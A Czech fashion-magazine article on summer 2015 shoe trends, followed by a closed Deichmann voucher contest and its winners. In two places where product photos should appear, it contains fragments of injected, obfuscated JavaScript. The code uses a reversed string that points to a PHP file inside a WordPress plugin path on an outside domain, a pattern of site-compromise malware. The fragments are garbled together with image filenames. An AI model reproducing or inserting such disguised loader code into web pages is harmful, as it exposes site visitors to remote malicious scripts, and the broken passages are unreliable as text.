FACESTARMóda a krásaSOUTĚŽ UKONČENA! HORKÉ TIPY PRO ŽHAVÉ LÉTO. VYHRAJTE BOTKY, KTERÉ BUDETE MILOVAT...

SOUTĚŽ UKONČENA! HORKÉ TIPY PRO ŽHAVÉ LÉTO. VYHRAJTE BOTKY, KTERÉ BUDETE MILOVAT PŘI KAŽDÉM KROKU

 

 

Barvy léta

and

Letní oblékání si žádá vtip, barvy a trendy styl. Ačkoliv černá barva stále hraje podstatnou roli, léto momentálně ovládají převážně světlé a pastelové tóny. Trendy je také bílá, růžová, odstíny champagne, světle modrá, mátová, meruňková, béžová a tělová. 

Uvolněte se!

and

Barvy neovládly jen oblečení, ale také obuv. Letní obutí se ponese převážně v ležérním, uvolněném stylu. Nosí se nízká obuv bez výrazných aplikací. Krystaly a kamínky se objevují nejvíce na nízkých sandálech. Pokud hledáte boty, ve kterých budete vypadat žensky, a zároveň vám poskytnou potřebné pohodlí, vsaďte na slippery – nazouvací plátěnou, džínovou nebo koženou obuv. Opravdový letní pocit navodí provazová podešev typická pro espadrillky, která vypadá něžně žensky.

Všechno, co má díru, frčí!

and

Stejně jako v loňském roce i letos představují ideální obuv do teplého počasí modely s děrováním, průstřihy, otevřenou patou nebo špičkou či perforacemi, jež dají vyniknout nahé kůži. Upustilo se od honosných dekorací. Na nízkých mokasínách, lehké šněrovací obuvi, shooties (kotníkových botách na podpatku) a letních kozačkách, převážně v bílé barvě a béžových odstínech, vás zaujmou děrované plochy, jemné zdobení a rafinované průstřihy. Perforace se objevují na nejrůznějších materiálech, může to být elegantní krajka, hrubý sisal, lehké plátno nebo jemná kůže.

Pohodlně po městě

and

Protože k létu neodmyslitelně patří sport, ať už cyklistika, jogging nebo třeba volejbal, nesmíme zapomenout ani na tenisky. Ty už poměrně dlouhou dobu zaujímají v našem botníku pevné místo. Nosit je můžete nejen na sport, ale klidně na schůzky nebo do práce. Čím dál více se z nich totiž stává módní obuv a technické materiály, jako je síťovina a neopren, slouží jako stylový prvek. Barvám vládne světlý základ, občas v kombinaci se zářivými neonovými tóny, jako je modrá, růžová nebo barva máty.

Korkáče jsou zpět!

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandaly_zabky_1199_czk_39_90_eur_Fotor_Collage.jpg“ alt=““ width=“630″ height=“490″ />

Tuto sezónu jsou populární také pantofle s korkovou stélkou. Tato obuv, dosud řazená převážně do kategorie „zdravotní“, zažívá obrovský boom. Díky metalickému nádechu, zdobení v podobě cvočků, ozdobných pásků a větších štrasových kamínků představují tyto pantofle luxusní doplněk, který tvoří zdánlivě neslučitelnou, avšak trendy kombinaci s letními večerními šaty. Kromě pantoflí se na výsluní drží také klasické žabky – korková stélka jim dodává nový a pohodlný vzhled.

Oblíbené sandálky a klíny

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandalky_korkovy_klinek_649_czk_22_90_eur_Fotor_Collage.jpg“ alt=““ width=“630″ height=“490″ />

Léto ovládají žabky a lehké sandály, nízké i na podpatku, s řemínkem okolo kotníku nebo s T-páskem. Ani ony nejsou zbytečně přezdobené. Ozdobné prvky, jako jsou řetízky, stuhy, cvoky a kamínky, se objevují jen v omezené míře. Favority sezóny jsou sandály se silnou, tvarovanou podešví vyrobenou z ultralehkých materiálů, jako je guma nebo korek.

Klínové podpatky zažívají další sezónu. Jak na espadrillkách, tak na sandálech a lodičkách představují letní variantu k vepředu i vzadu stejně vysokým briketovým platformám inspirovaným asijským stylem. Navzdory tomu, že létu dominují modely bez podpatků, ani milovnice vysokých podpatků nepřichází zkrátka. Žensky působící sandálky a lodičky zdobí jak úzké, tak široké podpatky. Představují tak vhodnou, elegantní obuv do města. Děrování a perforované materiály jim dodají ten správný šmrnc.

Chtěli byste nové boty? Soutěžte s námi a vyhrajte je!

Nyní máte jedinečnou šanci vyhrát jednu z 5 poukázek v hodnotě 500 Kč na nákup nové, trendy obuvi od společnosti Deichmann. Stačí správně zodpovědět otázku:

Ve kterém roce byla v německém Essenu založena společnost Deichmann?

a)     1903

b)    1913

c)     1923

Správnou odpověď naleznete na www.deichmann.com. Správné odpovědi zasílejte na emailovou adresu soutez@facestar.cz, do pole předmět přidejte heslo „DEICHMANN“, dále nezapomeňte uvést své jméno a příjmení, kontaktní adresu a telefonní spojení. Soutěž probíhá od 23. 7. – 9. 8. 2015 do 24:00h!

Gratulujeme a výhry posíláme: Tomáš H., Jičín, Alžběta F., Pardubice, Eva H., Jindřichův Hradec, Jan V., Praha.

Související články